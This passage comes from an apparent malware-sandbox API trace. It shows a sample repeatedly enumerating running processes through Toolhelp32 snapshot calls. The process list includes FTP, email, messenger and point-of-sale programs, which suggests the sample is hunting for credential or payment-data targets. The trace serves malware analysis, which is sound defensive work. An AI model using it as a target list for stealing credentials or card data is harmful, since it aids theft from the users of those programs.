lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0060.671] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.672] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.673] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.673] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 0 [0060.722] CloseHandle (hObject=0x17c) returned 1 [0060.723] Sleep (dwMilliseconds=0x1) [0060.761] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0060.765] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.766] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.766] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.767] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.768] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.768] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.769] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.770] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.770] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.771] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.771] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.772] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.772] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.773] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.774] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.774] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.775] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.775] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.776] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.777] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.777] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.778] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.778] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.779] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0060.780] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0060.780] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0060.781] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0060.781] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0060.782] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0060.783] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0060.783] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0060.784] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0060.785] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0060.785] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0060.786] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0060.786] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0060.787] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0060.788] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0060.788] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0060.789] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0060.789] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0060.790] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0060.791] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0060.791] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0060.792] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0060.792] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0060.793] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0060.793] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0060.794] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0060.795] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0060.795] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0060.796] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0060.796] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0060.797] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0060.798] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0060.798] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0060.799] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0060.801] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0060.802] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0060.803] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0060.804] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0060.805] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0060.806] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0060.807] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0060.807] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0060.808] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0060.809] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0060.810] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0060.811] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0060.812] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0060.813] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0060.814] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0060.815] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0060.816] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0060.817] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0060.818] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0060.819] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0060.820] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0060.820] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, 